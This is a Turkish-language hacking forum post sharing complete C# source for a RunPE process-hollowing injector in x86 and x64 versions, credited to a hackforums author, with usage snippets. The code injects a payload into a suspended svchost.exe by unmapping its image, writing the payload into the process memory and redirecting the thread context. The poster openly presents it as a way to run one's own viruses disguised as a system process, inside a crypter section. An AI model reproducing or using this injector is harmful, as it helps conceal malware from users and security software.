İPUCU

Undetected Crypter, HEX kodlama ile ilgili konular

Seçenekler

[C#] RunPE x86 / x64

03-12-2018 18:16
#1
Fred18 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2011
Nereden:
BakÜ
Mesajlar:
251
Teşekkür (Etti):
66
Teşekkür (Aldı):
60
Konular:
45
Azerbaycandan selamlar arkadaşlar!
Sizlere verdiyim bu iki kodla kendi virüslerinizi RunPE yapa bilirsiniz.

RunPE nedir?
Energizer01: herhangi tür virüsün sistem dosyası adı altında çalışmasıdır,örneğin görev yöneticisini açtığında svchost.exe yazar, sistem dosyası diye ellemezsin ,yeterli güvenlik önlemi yoksa orda gizlice çalışır, bir nevi virüsü kamuflajlama diyebiliriz...

x86 kod:

Kod:
using System;
using System.ComponentModel;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;
namespace HackForums.gigajew
{
    /// <summary>
    /// This RunPE was created by gigajew @ www.hackforums.net for Windows 10
    /// Please leave these credits as a reminder of all the hours of work put into this
    /// </summary>
    public class WinXParameters
    {
        public byte[] Payload;
        public string HostFileName;
        public string[] Arguments;
        public bool Hidden;
        public static WinXParameters Create(byte[] payload, string hostFileName, bool hidden, params string[] arguments)
        {
            WinXParameters parameters = new WinXParameters();
            parameters.HostFileName = hostFileName;
            parameters.Payload = payload;
            parameters.Arguments = arguments;
            parameters.Hidden = hidden;
            return parameters;
        }
        public string GetFormattedHostFileName()
        {
            if (Arguments != null)
            {
                if (Arguments.Length > 0)
                {
                    return string.Format("{0} {1}", HostFileName, string.Join(" ", Arguments));
                }
            }
            return HostFileName;
        }
    }
    /// <summary>
    /// This RunPE was created by gigajew @ www.hackforums.net for Windows 10
    /// Please leave these credits as a reminder of all the hours of work put into this
    /// </summary>
    public static unsafe class WinXRunPE
    {
        public static bool Inject(WinXParameters parameters)
        {
            _IMAGE_DOS_HEADER* dosHeader;
            _IMAGE_NT_HEADERS* ntHeaders;
            IntPtr pImageBase;
            IntPtr pBuffer;
            bool emulatedi386 = false;
            string currentDir = Path.GetDirectoryName(Assembly.GetEntryAssembly().********);
            ProcessInfo processInfo;
            processInfo = new ProcessInfo();
            _CONTEXT context = new _CONTEXT();
            context.ContextFlags = 0x10001b;
            // get the address of buffer
            fixed (byte* pBufferUnsafe = parameters.Payload)
            {
                pBuffer = (IntPtr)pBufferUnsafe;
                dosHeader = (_IMAGE_DOS_HEADER*)(pBufferUnsafe);
                ntHeaders = (_IMAGE_NT_HEADERS*)(pBufferUnsafe + (dosHeader->e_lfanew));
            }
            // security checks
            if (dosHeader->e_magic != 0x5A4D || ntHeaders->Signature != 0x00004550)
            {
                throw new Win32Exception("Not a valid Win32 PE! -gigajew");
            }
            // check 32-bit
            if (ntHeaders->OptionalHeader.Magic != 0x10b)
            {
                throw new Exception("This RunPE only supports i386-built executables! -gigajew");
            }
            // patch (by Menalix/gigajew)
            Buffer.SetByte(parameters.Payload, 0x398, 0x2);
            // init
            if (!CreateProcess(null, parameters.GetFormattedHostFileName(), IntPtr.Zero, IntPtr.Zero, false, parameters.Hidden ? 0x00000004u | 0x08000000u : 0x00000004u, IntPtr.Zero, currentDir, new byte[0], &processInfo))
            {
                if (processInfo.hProcess != IntPtr.Zero)
                {
                    if (!TerminateProcess(processInfo.hProcess, -1))
                    {
                        throw new Win32Exception(Marshal.GetLastWin32Error());
                    }
                    else
                    {
                        CloseHandle(processInfo.hProcess);
                        CloseHandle(processInfo.hThread);
                    }
                }
                return false;
            }
            // check emulated i386
            IsWow64Process(processInfo.hProcess, ref emulatedi386);
            // unmap
            pImageBase = (IntPtr)(ntHeaders->OptionalHeader.ImageBase);
            NtUnmapViewOfSection(processInfo.hProcess, pImageBase); // we don't care if this fails
            // allocate
            if (VirtualAllocEx(processInfo.hProcess, pImageBase, ntHeaders->OptionalHeader.SizeOfImage, 0x3000u, 0x40u) == IntPtr.Zero)
            {
                if (!TerminateProcess(processInfo.hProcess, -1))
                {
                    throw new Win32Exception(Marshal.GetLastWin32Error());
                }
                else
                {
                    CloseHandle(processInfo.hProcess);
                    CloseHandle(processInfo.hThread);
                    return false;
                }
            }
            // copy image headers
            if (!WriteProcessMemory(processInfo.hProcess, pImageBase, pBuffer, ntHeaders->OptionalHeader.SizeOfHeaders, IntPtr.Zero))
            {
                if (!TerminateProcess(processInfo.hProcess, -1))
                {
                    throw new Win32Exception(Marshal.GetLastWin32Error());
                }
                else
                {
                    CloseHandle(processInfo.hProcess);
                    CloseHandle(processInfo.hThread);
                    return false;
                }
            }
            // copy sections
            for (ushort i = 0; i < ntHeaders->FileHeader.NumberOfSections; i++)
            {
                _IMAGE_SECTION_HEADER* section = (_IMAGE_SECTION_HEADER*)(pBuffer.ToInt64() + (dosHeader->e_lfanew) + Marshal.SizeOf(typeof(_IMAGE_NT_HEADERS)) + (Marshal.SizeOf(typeof(_IMAGE_SECTION_HEADER)) * i));
                if (!WriteProcessMemory(processInfo.hProcess, (IntPtr)(pImageBase.ToInt64() + (section->VirtualAddress)), (IntPtr)(pBuffer.ToInt64() + (section->PointerToRawData)), section->SizeOfRawData, IntPtr.Zero))
                {
                    if (!TerminateProcess(processInfo.hProcess, -1))
                    {
                        throw new Win32Exception(Marshal.GetLastWin32Error());
                    }
                    else
                    {
                        CloseHandle(processInfo.hProcess);
                        CloseHandle(processInfo.hThread);
                        return false;
                    }
                }
            }
            // get thread context
            if (emulatedi386)
            {
                if (!Wow64GetThreadContext(processInfo.hThread, &context))
                {
                    if (!TerminateProcess(processInfo.hProcess, -1))
                    {
                        throw new Win32Exception(Marshal.GetLastWin32Error());
                    }
                    else
                    {
                        CloseHandle(processInfo.hProcess);
                        CloseHandle(processInfo.hThread);
                        return false;
                    }
                }
            }
            else
            {
                if (!GetThreadContext(processInfo.hThread, &context))
                {
                    if (!TerminateProcess(processInfo.hProcess, -1))
                    {
                        throw new Win32Exception(Marshal.GetLastWin32Error());
                    }
                    else
                    {
                        CloseHandle(processInfo.hProcess);
                        CloseHandle(processInfo.hThread);
                        return false;
                    }
                }
            }
            // patch imagebase
            IntPtr address = Marshal.AllocHGlobal(8);
            ulong puImageBase = (ulong)pImageBase.ToInt64();
            byte[] pbImageBase = new byte[8];
            pbImageBase[0] = (byte)(puImageBase >> 0);
            pbImageBase[1] = (byte)(puImageBase >> 8);
            pbImageBase[2] = (byte)(puImageBase >> 16);
            pbImageBase[3] = (byte)(puImageBase >> 24);
            pbImageBase[4] = (byte)(puImageBase >> 32);
            pbImageBase[5] = (byte)(puImageBase >> 40);
            pbImageBase[6] = (byte)(puImageBase >> 48);
            pbImageBase[7] = (byte)(puImageBase >> 56);
            Marshal.Copy(pbImageBase, 0, address, 8);
            if (!WriteProcessMemory(processInfo.hProcess, (IntPtr)(context.Ebx + 8ul), address, 4u, IntPtr.Zero))
            {
                Marshal.FreeHGlobal(address);
                if (!TerminateProcess(processInfo.hProcess, -1))
                {
                    throw new Win32Exception(Marshal.GetLastWin32Error());
                }
                else
                {
                    CloseHandle(processInfo.hProcess);
                    CloseHandle(processInfo.hThread);
                    return false;
                }
            }
            Marshal.FreeHGlobal(address);
            // patch ep
            context.Eax = (uint)(pImageBase.ToInt64() + (ntHeaders->OptionalHeader.AddressOfEntryPoint));
            // set context
            if (emulatedi386)
            {
                if (!Wow64SetThreadContext(processInfo.hThread, &context))
                {
                    if (!TerminateProcess(processInfo.hProcess, -1))
                    {
                        throw new Win32Exception(Marshal.GetLastWin32Error());
                    }
                    else
                    {
                        CloseHandle(processInfo.hProcess);
                        CloseHandle(processInfo.hThread);
                        return false;
                    }
                }
            }
            else
            {
                if (!SetThreadContext(processInfo.hThread, &context))
                {
                    if (!TerminateProcess(processInfo.hProcess, -1))
                    {
                        throw new Win32Exception(Marshal.GetLastWin32Error());
                    }
                    else
                    {
                        CloseHandle(processInfo.hProcess);
                        CloseHandle(processInfo.hThread);
                        return false;
                    }
                }
            }
            // resume thread
            ResumeThread(processInfo.hThread);
            // cleanup
            CloseHandle(processInfo.hProcess);
            CloseHandle(processInfo.hThread);
            return true;
        }
        [DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
        [return: MarshalAs(UnmanagedType.Bool)]
        private static extern bool CreateProcess([MarshalAs(UnmanagedType.LPTStr)]string lpApplicationName,
                                         [MarshalAs(UnmanagedType.LPTStr)]string lpCommandLine,
                                         [MarshalAs(UnmanagedType.SysInt)]IntPtr lpProcessAttributes,
                                         [MarshalAs(UnmanagedType.SysInt)]IntPtr lpThreadAttributes,
                                         [MarshalAs(UnmanagedType.Bool)]bool bInheritHandles,
                                         [MarshalAs(UnmanagedType.U4)]uint dwCreationFlags,
                                         [MarshalAs(UnmanagedType.SysInt)]IntPtr lpEnvironment,
                                         [MarshalAs(UnmanagedType.LPTStr)]string lpCurrentDirectory,
                                         byte[] lpStartupInfo,
                                         ProcessInfo* lpProcessInfo);
        [DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
        [return: MarshalAs(UnmanagedType.Bool)]
        private static extern bool TerminateProcess([MarshalAs(UnmanagedType.SysInt)]IntPtr hProcess, [MarshalAs(UnmanagedType.I4)]int exitCode);
        [DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
        [return: MarshalAs(UnmanagedType.Bool)]
        private static extern bool CloseHandle([MarshalAs(UnmanagedType.SysInt)]IntPtr hObject);
        [DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
        [return: MarshalAs(UnmanagedType.Bool)]
        private static extern bool Wow64GetThreadContext([MarshalAs(UnmanagedType.SysInt)]IntPtr hThread, _CONTEXT* pContext);
        [DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
        [return: MarshalAs(UnmanagedType.Bool)]
        private static extern bool Wow64SetThreadContext([MarshalAs(UnmanagedType.SysInt)]IntPtr hThread, _CONTEXT* pContext);
        [DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
        [return: MarshalAs(UnmanagedType.Bool)]
        private static extern bool GetThreadContext([MarshalAs(UnmanagedType.SysInt)]IntPtr hThread, _CONTEXT* pContext);
        [DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
        [return: MarshalAs(UnmanagedType.Bool)]
        private static extern bool SetThreadContext([MarshalAs(UnmanagedType.SysInt)]IntPtr hThread, _CONTEXT* pContext);
        [DllImport("ntdll.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
        [return: MarshalAs(UnmanagedType.U4)]
        private static extern uint NtUnmapViewOfSection([MarshalAs(UnmanagedType.SysInt)]IntPtr hProcess, [MarshalAs(UnmanagedType.SysInt)]IntPtr lpBaseAddress);
        [DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
        [return: MarshalAs(UnmanagedType.SysInt)]
        private static extern IntPtr VirtualAllocEx([MarshalAs(UnmanagedType.SysInt)]IntPtr hProcess,
                                                    [MarshalAs(UnmanagedType.SysInt)]IntPtr lpAddress,
                                                    [MarshalAs(UnmanagedType.U4)]uint dwSize,
                                                    [MarshalAs(UnmanagedType.U4)]uint flAl********Type,
                                                    [MarshalAs(UnmanagedType.U4)]uint flProtect);
        [DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
        [return: MarshalAs(UnmanagedType.Bool)]
        private static extern bool WriteProcessMemory([MarshalAs(UnmanagedType.SysInt)]IntPtr hProcess,
                                                        [MarshalAs(UnmanagedType.SysInt)]IntPtr lpBaseAddress,
                                                        [MarshalAs(UnmanagedType.SysInt)]IntPtr lpBuffer,
                                                        [MarshalAs(UnmanagedType.U4)]uint nSize,
                                                        [MarshalAs(UnmanagedType.SysInt)]IntPtr lpNumberOfBytesWritten);
        [DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
        [return: MarshalAs(UnmanagedType.U4)]
        private static extern uint ResumeThread([MarshalAs(UnmanagedType.SysInt)]IntPtr hThread);
        [DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
        [return: MarshalAs(UnmanagedType.Bool)]
        private static extern bool IsWow64Process([MarshalAs(UnmanagedType.SysInt)]IntPtr hProcess, [MarshalAs(UnmanagedType.Bool)]ref bool isWow64);
    }
    [StructLayout(LayoutKind.Sequential)]
    public struct ProcessInfo
    {
        public IntPtr hProcess;
        public IntPtr hThread;
    }
    [StructLayout(LayoutKind.Explicit, Size = 0x28)]
    public struct _IMAGE_SECTION_HEADER
    {
        [FieldOffset(0xc)]
        public UInt32 VirtualAddress;
        [FieldOffset(0x10)]
        public UInt32 SizeOfRawData;
        [FieldOffset(0x14)]
        public UInt32 PointerToRawData;
    }
    [StructLayout(LayoutKind.Explicit, Size = 0x14)]
    public struct _IMAGE_FILE_HEADER
    {
        [FieldOffset(0x02)]
        public ushort NumberOfSections;
    }
    [StructLayout(LayoutKind.Explicit, Size = 0x40)]
    public struct _IMAGE_DOS_HEADER
    {
        [FieldOffset(0x00)]
        public ushort e_magic;
        [FieldOffset(0x3c)]
        public uint e_lfanew;
    }
    [StructLayout(LayoutKind.Explicit, Size = 0xf8)]
    public struct _IMAGE_NT_HEADERS
    {
        [FieldOffset(0x00)]
        public uint Signature;
        [FieldOffset(0x04)]
        public _IMAGE_FILE_HEADER FileHeader;
        [FieldOffset(0x18)]
        public _IMAGE_OPTIONAL_HEADER OptionalHeader;
    }
    [StructLayout(LayoutKind.Explicit, Size = 0xe0)]
    public struct _IMAGE_OPTIONAL_HEADER
    {
        [FieldOffset(0x00)]
        public ushort Magic;
        [FieldOffset(0x010)]
        public uint AddressOfEntryPoint;
        [FieldOffset(0x1c)]
        public uint ImageBase;
        [FieldOffset(0x38)]
        public uint SizeOfImage;
        [FieldOffset(0x3c)]
        public uint SizeOfHeaders;
    }
    [StructLayout(LayoutKind.Explicit, Size = 0x2cc)]
    public struct _CONTEXT
    {
        [FieldOffset(0x00)]
        public uint ContextFlags;
        [FieldOffset(0xa4)]
        public uint Ebx;
        [FieldOffset(0xb0)]
        public uint Eax;
    }
}
kullanım kodu:

Kod:
public static int Main(string[] args)
        {
            byte[] payload = File.ReadAllBytes("putty.exe");
            string i386svchost = "C:\\Windows\\SysWow64\\svchost.exe"; //notice SysWow64 instead of System32
            string[] arguments = null;
            bool hidden = false;
            WinXParameters parameters = WinXParameters.Create(payload, i386svchost, hidden, arguments);
            bool res = WinXRunPE.Inject(parameters);
            Console.WriteLine("Executed: {0}", res.ToString());
            Console.ReadLine();
            return 0;
        }
__________________________________________________ ________________


x64 kodu:

Kod:
using System;
using System.ComponentModel;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;
namespace HackForums.gigajew
{
    /// <summary>
    /// This RunPE was created by gigajew @ www.hackforums.net for Windows 10 x64
    /// Please leave these credits as a reminder of all the hours of work put into this
    /// </summary>
    public class WinXParameters
    {
        public byte[] Payload;
        public string HostFileName;
        public string[] Arguments;
        public bool Hidden;
        public static WinXParameters Create(byte[] payload, string hostFileName, bool hidden, params string[] arguments)
        {
            WinXParameters parameters = new WinXParameters();
            parameters.HostFileName = hostFileName;
            parameters.Payload = payload;
            parameters.Arguments = arguments;
            parameters.Hidden = hidden;
            return parameters;
        }
        public string GetFormattedHostFileName()
        {
            if (Arguments != null)
            {
                if (Arguments.Length > 0)
                {
                    return string.Format("{0} {1}", HostFileName, string.Join(" ", Arguments));
                }
            }
            return HostFileName;
        }
    }
    /// <summary>
    /// This RunPE was created by gigajew @ www.hackforums.net for Windows 10 x64
    /// Please leave these credits as a reminder of all the hours of work put into this
    /// </summary>
    public static unsafe class WinXRunPE_AMD64
    {
        public static bool Inject(WinXParameters parameters)
        {
            _IMAGE_DOS_HEADER* dosHeader;
            _IMAGE_NT_HEADERS64* ntHeaders;
            IntPtr pImageBase;
            IntPtr pBuffer;
            string currentDir = Path.GetDirectoryName(Assembly.GetEntryAssembly().********);
            ProcessInfo processInfo;
            processInfo = new ProcessInfo();
            _CONTEXT_AMD64 context = new _CONTEXT_AMD64();
            context.ContextFlags = 0x10001b;
            // get the address of buffer
            fixed (byte* pBufferUnsafe = parameters.Payload)
            {
                pBuffer = (IntPtr)pBufferUnsafe;
                dosHeader = (_IMAGE_DOS_HEADER*)(pBufferUnsafe);
                ntHeaders = (_IMAGE_NT_HEADERS64*)(pBufferUnsafe + (dosHeader->e_lfanew));
            }
            // security checks
            if (dosHeader->e_magic != 0x5A4D || ntHeaders->Signature != 0x00004550)
            {
                throw new Win32Exception("Not a valid Win32 PE! -gigajew");
            }
            // check 32-bit
            if (ntHeaders->OptionalHeader.Magic != 0x20b)
            {
                throw new Exception("This RunPE only supports AMD64-built executables! -gigajew");
            }
            // init
            if (!CreateProcess(null, parameters.GetFormattedHostFileName(), IntPtr.Zero, IntPtr.Zero, false, parameters.Hidden ? 0x00000004u | 0x08000000u : 0x00000004u, IntPtr.Zero, currentDir, new byte[0], &processInfo))
            {
                if (processInfo.hProcess != IntPtr.Zero)
                {
                    if (!TerminateProcess(processInfo.hProcess, -1))
                    {
                        throw new Win32Exception(Marshal.GetLastWin32Error());
                    }
                    else
                    {
                        CloseHandle(processInfo.hProcess);
                        CloseHandle(processInfo.hThread);
                    }
                }
                return false;
            }
            // unmap
            pImageBase = (IntPtr)(ntHeaders->OptionalHeader.ImageBase);
            NtUnmapViewOfSection(processInfo.hProcess, pImageBase); // we don't care if this fails
            // allocate
            if (VirtualAllocEx(processInfo.hProcess, pImageBase, ntHeaders->OptionalHeader.SizeOfImage, 0x3000u, 0x40u) == IntPtr.Zero)
            {
                if (!TerminateProcess(processInfo.hProcess, -1))
                {
                    throw new Win32Exception(Marshal.GetLastWin32Error());
                }
                else
                {
                    CloseHandle(processInfo.hProcess);
                    CloseHandle(processInfo.hThread);
                    return false;
                }
            }
            // copy image headers
            if (!WriteProcessMemory(processInfo.hProcess, pImageBase, pBuffer, ntHeaders->OptionalHeader.SizeOfHeaders, IntPtr.Zero))
            {
                if (!TerminateProcess(processInfo.hProcess, -1))
                {
                    throw new Win32Exception(Marshal.GetLastWin32Error());
                }
                else
                {
                    CloseHandle(processInfo.hProcess);
                    CloseHandle(processInfo.hThread);
                    return false;
                }
            }
            // copy sections
            for (ushort i = 0; i < ntHeaders->FileHeader.NumberOfSections; i++)
            {
                _IMAGE_SECTION_HEADER* section = (_IMAGE_SECTION_HEADER*)(pBuffer.ToInt64() + (dosHeader->e_lfanew) + Marshal.SizeOf(typeof(_IMAGE_NT_HEADERS64)) + (Marshal.SizeOf(typeof(_IMAGE_SECTION_HEADER)) * i));
                if (!WriteProcessMemory(processInfo.hProcess, (IntPtr)(pImageBase.ToInt64() + (section->VirtualAddress)), (IntPtr)(pBuffer.ToInt64() + (section->PointerToRawData)), section->SizeOfRawData, IntPtr.Zero))
                {
                    if (!TerminateProcess(processInfo.hProcess, -1))
                    {
                        throw new Win32Exception(Marshal.GetLastWin32Error());
                    }
                    else
                    {
                        CloseHandle(processInfo.hProcess);
                        CloseHandle(processInfo.hThread);
                        return false;
                    }
                }
            }
            // get thread context
            if (!GetThreadContext(processInfo.hThread, &context))
            {
                if (!TerminateProcess(processInfo.hProcess, -1))
                {
                    throw new Win32Exception(Marshal.GetLastWin32Error());
                }
                else
                {
                    CloseHandle(processInfo.hProcess);
                    CloseHandle(processInfo.hThread);
                    return false;
                }
            }
            // patch imagebase
            IntPtr address = Marshal.AllocHGlobal(8);
            ulong puImageBase = (ulong)pImageBase.ToInt64();
            byte[] pbImageBase = new byte[8];
            pbImageBase[0] = (byte)(puImageBase >> 0);
            pbImageBase[1] = (byte)(puImageBase >> 8);
            pbImageBase[2] = (byte)(puImageBase >> 16);
            pbImageBase[3] = (byte)(puImageBase >> 24);
            pbImageBase[4] = (byte)(puImageBase >> 32);
            pbImageBase[5] = (byte)(puImageBase >> 40);
            pbImageBase[6] = (byte)(puImageBase >> 48);
            pbImageBase[7] = (byte)(puImageBase >> 56);
            Marshal.Copy(pbImageBase, 0, address, 8);
            if (!WriteProcessMemory(processInfo.hProcess, (IntPtr)(context.Rdx + 16ul), address, 8u, IntPtr.Zero))
            {
                Marshal.FreeHGlobal(address);
                if (!TerminateProcess(processInfo.hProcess, -1))
                {
                    throw new Win32Exception(Marshal.GetLastWin32Error());
                }
                else
                {
                    CloseHandle(processInfo.hProcess);
                    CloseHandle(processInfo.hThread);
                    return false;
                }
            }
            Marshal.FreeHGlobal(address);
            // patch ep
            context.Rcx = (ulong)(pImageBase.ToInt64() + (ntHeaders->OptionalHeader.AddressOfEntryPoint));
            // set context
            if (!SetThreadContext(processInfo.hThread, &context))
            {
                if (!TerminateProcess(processInfo.hProcess, -1))
                {
                    throw new Win32Exception(Marshal.GetLastWin32Error());
                }
                else
                {
                    CloseHandle(processInfo.hProcess);
                    CloseHandle(processInfo.hThread);
                    return false;
                }
            }
            // resume thread
            ResumeThread(processInfo.hThread);
            // cleanup
            CloseHandle(processInfo.hProcess);
            CloseHandle(processInfo.hThread);
            return true;
        }
        [DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
        [return: MarshalAs(UnmanagedType.Bool)]
        private static extern bool CreateProcess([MarshalAs(UnmanagedType.LPTStr)]string lpApplicationName,
                                         [MarshalAs(UnmanagedType.LPTStr)]string lpCommandLine,
                                         [MarshalAs(UnmanagedType.SysInt)]IntPtr lpProcessAttributes,
                                         [MarshalAs(UnmanagedType.SysInt)]IntPtr lpThreadAttributes,
                                         [MarshalAs(UnmanagedType.Bool)]bool bInheritHandles,
                                         [MarshalAs(UnmanagedType.U4)]uint dwCreationFlags,
                                         [MarshalAs(UnmanagedType.SysInt)]IntPtr lpEnvironment,
                                         [MarshalAs(UnmanagedType.LPTStr)]string lpCurrentDirectory,
                                         byte[] lpStartupInfo,
                                         ProcessInfo* lpProcessInfo);
        [DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
        [return: MarshalAs(UnmanagedType.Bool)]
        private static extern bool TerminateProcess([MarshalAs(UnmanagedType.SysInt)]IntPtr hProcess, [MarshalAs(UnmanagedType.I4)]int exitCode);
        [DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
        [return: MarshalAs(UnmanagedType.Bool)]
        private static extern bool CloseHandle([MarshalAs(UnmanagedType.SysInt)]IntPtr hObject);
        [DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
        [return: MarshalAs(UnmanagedType.Bool)]
        private static extern bool Wow64GetThreadContext([MarshalAs(UnmanagedType.SysInt)]IntPtr hThread, _CONTEXT_AMD64* pContext);
        [DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
        [return: MarshalAs(UnmanagedType.Bool)]
        private static extern bool Wow64SetThreadContext([MarshalAs(UnmanagedType.SysInt)]IntPtr hThread, _CONTEXT_AMD64* pContext);
        [DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
        [return: MarshalAs(UnmanagedType.Bool)]
        private static extern bool GetThreadContext([MarshalAs(UnmanagedType.SysInt)]IntPtr hThread, _CONTEXT_AMD64* pContext);
        [DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
        [return: MarshalAs(UnmanagedType.Bool)]
        private static extern bool SetThreadContext([MarshalAs(UnmanagedType.SysInt)]IntPtr hThread, _CONTEXT_AMD64* pContext);
        [DllImport("ntdll.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
        [return: MarshalAs(UnmanagedType.U4)]
        private static extern uint NtUnmapViewOfSection([MarshalAs(UnmanagedType.SysInt)]IntPtr hProcess, [MarshalAs(UnmanagedType.SysInt)]IntPtr lpBaseAddress);
        [DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
        [return: MarshalAs(UnmanagedType.SysInt)]
        private static extern IntPtr VirtualAllocEx([MarshalAs(UnmanagedType.SysInt)]IntPtr hProcess,
                                                    [MarshalAs(UnmanagedType.SysInt)]IntPtr lpAddress,
                                                    [MarshalAs(UnmanagedType.U4)]uint dwSize,
                                                    [MarshalAs(UnmanagedType.U4)]uint flAl********Type,
                                                    [MarshalAs(UnmanagedType.U4)]uint flProtect);
        [DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
        [return: MarshalAs(UnmanagedType.Bool)]
        private static extern bool WriteProcessMemory([MarshalAs(UnmanagedType.SysInt)]IntPtr hProcess,
                                                        [MarshalAs(UnmanagedType.SysInt)]IntPtr lpBaseAddress,
                                                        [MarshalAs(UnmanagedType.SysInt)]IntPtr lpBuffer,
                                                        [MarshalAs(UnmanagedType.U4)]uint nSize,
                                                        [MarshalAs(UnmanagedType.SysInt)]IntPtr lpNumberOfBytesWritten);
        [DllImport("kernel32.dll", BestFitMapping = true, CallingConvention = CallingConvention.Winapi, CharSet = CharSet.Auto, SetLastError = true)]
        [return: MarshalAs(UnmanagedType.U4)]
        private static extern uint ResumeThread([MarshalAs(UnmanagedType.SysInt)]IntPtr hThread);
    }
    [StructLayout(LayoutKind.Sequential)]
    public struct ProcessInfo
    {
        public IntPtr hProcess;
        public IntPtr hThread;
    }
    [StructLayout(LayoutKind.Explicit, Size = 0x28)]
    public struct _IMAGE_SECTION_HEADER
    {
        [FieldOffset(0xc)]
        public UInt32 VirtualAddress;
        [FieldOffset(0x10)]
        public UInt32 SizeOfRawData;
        [FieldOffset(0x14)]
        public UInt32 PointerToRawData;
    }
    [StructLayout(LayoutKind.Explicit, Size = 0x14)]
    public struct _IMAGE_FILE_HEADER
    {
        [FieldOffset(0x02)]
        public ushort NumberOfSections;
    }
    [StructLayout(LayoutKind.Explicit, Size = 0x40)]
    public struct _IMAGE_DOS_HEADER
    {
        [FieldOffset(0x00)]
        public ushort e_magic;
        [FieldOffset(0x3c)]
        public uint e_lfanew;
    }
    [StructLayout(LayoutKind.Explicit, Size = 0x108)]
    public struct _IMAGE_NT_HEADERS64
    {
        [FieldOffset(0x00)]
        public uint Signature;
        [FieldOffset(0x04)]
        public _IMAGE_FILE_HEADER FileHeader;
        [FieldOffset(0x18)]
        public _IMAGE_OPTIONAL_HEADER64 OptionalHeader;
    }
    [StructLayout(LayoutKind.Explicit, Size = 0xf0)]
    public struct _IMAGE_OPTIONAL_HEADER64
    {
        [FieldOffset(0x00)]
        public ushort Magic;
        [FieldOffset(0x010)]
        public uint AddressOfEntryPoint;
        [FieldOffset(0x18)]
        public ulong ImageBase;
        [FieldOffset(0x38)]
        public uint SizeOfImage;
        [FieldOffset(0x3c)]
        public uint SizeOfHeaders;
    }
    [StructLayout(LayoutKind.Explicit, Size = 0x4d0)]
    public struct _CONTEXT_AMD64
    {
        [FieldOffset(0x30)]
        public uint ContextFlags;
        [FieldOffset(0x80)]
        public ulong Rcx;
        [FieldOffset(0x88)]
        public ulong Rdx;
    }
}
kullanım için kod:

Kod:
public static int Main(string[] args)
        {
            byte[] payload = File.ReadAllBytes("putty.exe");
            string i386svchost = "C:\\Windows\\SysWow64\\svchost.exe"; //notice SysWow64 instead of System32
            string[] arguments = null;
            bool hidden = false;
            WinXParameters parameters = WinXParameters.Create(payload, i386svchost, hidden, arguments);
            bool res = WinXRunPE_AMD64.Inject(parameters);
            Console.WriteLine("Executed: {0}", res.ToString());
            Console.ReadLine();
            return 0;
        }
Alıntıdır! sağlıcakla kullanın. çalışıyor win 10 x86 da denedim
Kullanıcı İmzası
Saygilarimla....
Plans Teşekkür etti.


Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı